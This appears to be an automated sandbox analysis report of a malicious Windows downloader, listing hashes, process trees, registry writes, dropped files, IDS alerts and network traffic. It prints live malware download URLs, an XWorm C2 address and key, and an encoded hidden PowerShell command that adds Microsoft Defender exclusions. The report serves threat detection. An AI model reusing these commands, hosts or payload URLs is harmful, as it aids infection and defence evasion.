| File name: | 4363463463464363463463463.exe |
| Full analysis: | https://app.any.run/tasks/6720b85b-9c53-4a12-b1dc-73052a78477d |
| Verdict: | Malicious activity |
| Threats: | Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. |
| Analysis date: | February 10, 2024, 17:45:21 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows |
| MD5: | 2A94F3960C58C6E70826495F76D00B85 |
| SHA1: | E2A1A5641295F5EBF01A37AC1C170AC0814BB71A |
| SHA256: | 2FCAD226B17131DA4274E1B9F8F31359BDD325C9568665F08FD1F6C5D06A23CE |
| SSDEEP: | 192:2we8sGKE6MqyG7c20L7BIW12n/ePSmzkTInu8stYcFwVc03KY:9e8sGKfMqyGg20PKn/cRaInuptYcFwVY |
| .exe | | | Generic CIL Executable (.NET, Mono, etc.) (82.9) |
|---|---|---|
| .dll | | | Win32 Dynamic Link Library (generic) (7.4) |
| .exe | | | Win32 Executable (generic) (5.1) |
| .exe | | | Generic Win/DOS Executable (2.2) |
| .exe | | | DOS Executable Generic (2.2) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2023:12:22 08:29:10+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware |
| PEType: | PE32 |
| LinkerVersion: | 80 |
| CodeSize: | 5632 |
| InitializedDataSize: | 4608 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x3552 |
| OSVersion: | 4 |
| ImageVersion: | - |
| SubsystemVersion: | 6 |
| Subsystem: | Windows command line |
| FileVersionNumber: | 0.0.0.0 |
| ProductVersionNumber: | 0.0.0.0 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | Neutral |
| CharacterSet: | Unicode |
| FileDescription: | |
| FileVersion: | 0.0.0.0 |
| InternalName: | 4363463463464363463463463.exe |
| LegalCopyright: | |
| OriginalFileName: | 4363463463464363463463463.exe |
| ProductVersion: | 0.0.0.0 |
| AssemblyVersion: | 0.0.0.0 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 696 | "C:\Users\admin\Desktop\Files\first.exe" | C:\Users\admin\Desktop\Files\first.exe | 4363463463464363463463463.exe | ||||||||||||
User: admin Integrity Level: HIGH Description: Exit code: 0 Version: 0.0.0.0 Modules
XWorm(PID) Process(696) first.exe C291.92.249.37:9049 Keys AES5548 Options Splitter<Agent> USB drop name MutexaMtkXNimPlkESDx9 | |||||||||||||||
| 840 | powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | taskeng.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 920 | powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | taskeng.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 1072 | "C:\Users\admin\Desktop\Files\ed.exe" | C:\Users\admin\Desktop\Files\ed.exe | 4363463463464363463463463.exe | ||||||||||||
User: admin Company: Mileages Integrity Level: HIGH Description: Leftwards Gran Sensationally Exit code: 3221225477 Version: 1.0.0.0 Modules
| |||||||||||||||
| 1072 | "C:\Users\admin\Desktop\Files\soft.exe" | C:\Users\admin\Desktop\Files\soft.exe | — | 4363463463464363463463463.exe | |||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
| 1112 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\tmp1587.tmp.bat"" | C:\Windows\System32\cmd.exe | — | Client.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1196 | C:\Windows\system32\cmd.exe /c C:\Users\admin\AppData\Local\Temp\is64.bat | C:\Windows\System32\cmd.exe | — | CleanUp Icons FOP.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1236 | "C:\Users\admin\Desktop\Files\svchost.exe" | C:\Users\admin\Desktop\Files\svchost.exe | 4363463463464363463463463.exe | ||||||||||||
User: admin Company: Intel Integrity Level: HIGH Description: Intel® Driver & Support Assistant Exit code: 3221225477 Version: 23.4.39.9 Modules
| |||||||||||||||
| 1316 | C:\Windows\system32\cmd.exe /c mode con:cols=0080 lines=0025 | C:\Windows\System32\cmd.exe | — | CleanUp Icons FOP.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1316 | "C:\Users\admin\AppData\Local\Temp\AITMP0\7zipFOPBACKEND.exe" /s %1 | C:\Users\admin\AppData\Local\Temp\AITMP0\7zipFOPBACKEND.exe | — | Setup2010u32.exe | |||||||||||
User: admin Integrity Level: HIGH Description: 7zip FOP backend Data Exit code: 0 Version: 1.0.0.1 Modules
| |||||||||||||||
| (PID) Process: | (3216) 4363463463464363463463463.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\4363463463464363463463463_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (3216) 4363463463464363463463463.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\4363463463464363463463463_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (3216) 4363463463464363463463463.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\4363463463464363463463463_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (3216) 4363463463464363463463463.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\4363463463464363463463463_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (3216) 4363463463464363463463463.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\4363463463464363463463463_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (3216) 4363463463464363463463463.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\4363463463464363463463463_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
| (PID) Process: | (3216) 4363463463464363463463463.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\4363463463464363463463463_RASMANCS |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (3216) 4363463463464363463463463.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\4363463463464363463463463_RASMANCS |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (3216) 4363463463464363463463463.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\4363463463464363463463463_RASMANCS |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (3216) 4363463463464363463463463.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\4363463463464363463463463_RASMANCS |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2408 | asdfg.exe | C:\Users\admin\AppData\Local\Temp\BBLb.exe | executable | |
MD5:71EB1BC6E6DA380C1CB552D78B391B2A | SHA256:CEFA92EE6CC2FAD86C49DD37D57FF8AFCB9B9ABEF0A110689E6D771394256BD6 | |||
| 3216 | 4363463463464363463463463.exe | C:\Users\admin\Desktop\Files\rty27.exe | executable | |
MD5:B811F93BB852EDFDCEB786C087F409D9 | SHA256:8AEB0D61B1211FB7817A3D9F1CE69CD385F21F0C10B7DF1EEFE6C6E7FC6B9206 | |||
| 2688 | Client.exe | C:\Users\admin\AppData\Roaming\MyData\DataLogs.conf | text | |
MD5:CF759E4C5F14FE3EEC41B87ED756CEA8 | SHA256:C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761 | |||
| 2440 | BBLb.exe | C:\Users\admin\AppData\Local\TypeId\bcfsmn\AttributeString.exe | executable | |
MD5:71EB1BC6E6DA380C1CB552D78B391B2A | SHA256:CEFA92EE6CC2FAD86C49DD37D57FF8AFCB9B9ABEF0A110689E6D771394256BD6 | |||
| 2688 | Client.exe | C:\Users\admin\AppData\Local\Temp\tmp1587.tmp.bat | text | |
MD5:54C710C56C11A39664506B05A37D6CDD | SHA256:4B49CFC2F14292E3961659CBFC0B2D56E2AEC86DB8D16924B66A5D3BDB835E09 | |||
| 2688 | Client.exe | C:\Users\admin\AppData\Roaming\666.exe | executable | |
MD5:61570C8C0DF19C62B674C1E477730A87 | SHA256:67579963B6060FE6549091481DBB7808BEBCF21B3C994FA6791D656786773C9A | |||
| 3216 | 4363463463464363463463463.exe | C:\Users\admin\Desktop\Files\data64_6.exe | executable | |
MD5:D0D5020D6C7CB8142CF4970B3882AFFC | SHA256:08FA07C28724CB7A64F936EFA29B42446786F4A8F40DC311DD1BD5F3FE8D704A | |||
| 3216 | 4363463463464363463463463.exe | C:\Users\admin\Desktop\Files\gzz.exe | executable | |
MD5:7D9C852903DE2A824AA3F80DD1AB2B89 | SHA256:A777C77555A33B8263F836C5A029047FDEB74FD1F9ABB69D0B8F2A2B3D572583 | |||
| 3216 | 4363463463464363463463463.exe | C:\Users\admin\Desktop\Files\asdfg.exe | executable | |
MD5:1A917A85DCBB1D3DF5F4DD02E3A62873 | SHA256:217FBF967C95D1359314FCD53AE8D04489EB3C7BDC1F22110D5A8A476D1FC92E | |||
| 2588 | 4363463463464363463463463.exe | C:\Users\admin\Desktop\Files\Otte-Locker.exe | executable | |
MD5:EFB0074C175F069457524725656372BA | SHA256:169393C05B712B1D0E52171B3FF6D112984A790518D680E2D016DB6FF80412B5 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3216 | 4363463463464363463463463.exe | GET | 200 | 68.66.226.93:80 | http://thedoctorsgym.net/12/data64_6.exe | unknown | executable | 9.00 Kb | unknown |
3216 | 4363463463464363463463463.exe | GET | 200 | 47.99.151.68:1302 | http://47.99.151.68:1302/gzz.exe | unknown | executable | 327 Kb | unknown |
3216 | 4363463463464363463463463.exe | GET | 200 | 91.215.85.223:80 | http://marksidfgs.ug/asdfg.exe | unknown | executable | 2.13 Mb | unknown |
3216 | 4363463463464363463463463.exe | GET | 200 | 175.24.197.196:80 | http://175.24.197.196/Client.exe | unknown | executable | 74.5 Kb | unknown |
3216 | 4363463463464363463463463.exe | GET | 200 | 154.92.15.189:80 | http://ji.alie3ksgff.com/ef/rty27.exe | unknown | executable | 715 Kb | unknown |
2588 | 4363463463464363463463463.exe | GET | 200 | 20.169.49.77:80 | http://20.169.49.77/gpupdate.exe | unknown | executable | 1.56 Mb | unknown |
2424 | 4363463463464363463463463.exe | GET | 200 | 184.24.77.206:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2ce8919ccf05c243 | unknown | compressed | 65.2 Kb | unknown |
1956 | 4363463463464363463463463.exe | GET | 200 | 185.234.216.64:8000 | http://185.234.216.64:8000/Posh_v4_dropper_x64.exe | unknown | executable | 264 Kb | unknown |
2588 | 4363463463464363463463463.exe | GET | 200 | 188.114.97.3:80 | http://walkinglate.com/w/w-12.exe | unknown | executable | 3.32 Mb | unknown |
2424 | 4363463463464363463463463.exe | GET | 200 | 62.109.150.108:80 | http://starozitnictvi-znojmo.cz/ed.exe | unknown | executable | 748 Kb | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
3216 | 4363463463464363463463463.exe | 151.101.2.49:443 | urlhaus.abuse.ch | FASTLY | US | unknown |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
3216 | 4363463463464363463463463.exe | 47.99.151.68:1302 | — | Hangzhou Alibaba Advertising Co.,Ltd. | CN | unknown |
3216 | 4363463463464363463463463.exe | 68.66.226.93:80 | thedoctorsgym.net | A2HOSTING | US | unknown |
3216 | 4363463463464363463463463.exe | 140.82.121.4:443 | github.com | GITHUB | US | unknown |
2340 | data64_6.exe | 149.154.167.220:443 | api.telegram.org | Telegram Messenger Inc | GB | unknown |
3216 | 4363463463464363463463463.exe | 185.199.108.133:443 | raw.githubusercontent.com | FASTLY | US | unknown |
3216 | 4363463463464363463463463.exe | 91.215.85.223:80 | marksidfgs.ug | — | RU | unknown |
Domain | IP | Reputation |
|---|---|---|
urlhaus.abuse.ch |
| whitelisted |
thedoctorsgym.net |
| unknown |
github.com |
| shared |
api.telegram.org |
| shared |
raw.githubusercontent.com |
| shared |
marksidfgs.ug |
| unknown |
ji.alie3ksgff.com |
| malicious |
pastratas.ac.ug |
| unknown |
ctldl.windowsupdate.com |
| whitelisted |
pouya.blob.core.windows.net |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
3216 | 4363463463464363463463463.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent |
3216 | 4363463463464363463463463.exe | Potentially Bad Traffic | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile |
3216 | 4363463463464363463463463.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
3216 | 4363463463464363463463463.exe | Misc activity | ET INFO Packed Executable Download |
3216 | 4363463463464363463463463.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3216 | 4363463463464363463463463.exe | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response |
3216 | 4363463463464363463463463.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3216 | 4363463463464363463463463.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent |
1080 | svchost.exe | Misc activity | ET HUNTING Telegram API Domain in DNS Lookup |
2340 | data64_6.exe | Misc activity | ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI) |
Process | Message |
|---|---|
4363463463464363463463463.exe | The specified executable is not a valid application for this OS platform.
|
4363463463464363463463463.exe | The specified executable is not a valid application for this OS platform.
|
4363463463464363463463463.exe | The specified executable is not a valid application for this OS platform.
|
4363463463464363463463463.exe | The specified executable is not a valid application for this OS platform.
|
4363463463464363463463463.exe | The specified executable is not a valid application for this OS platform.
|
WeChat.exe |
%s------------------------------------------------
--- Themida Professional ---
--- (c)2010 Oreans Technologies ---
------------------------------------------------
|
4363463463464363463463463.exe | The specified executable is not a valid application for this OS platform.
|
4363463463464363463463463.exe | The specified executable is not a valid application for this OS platform.
|
4363463463464363463463463.exe | The specified executable is not a valid application for this OS platform.
|
4363463463464363463463463.exe | The specified executable is not a valid application for this OS platform.
|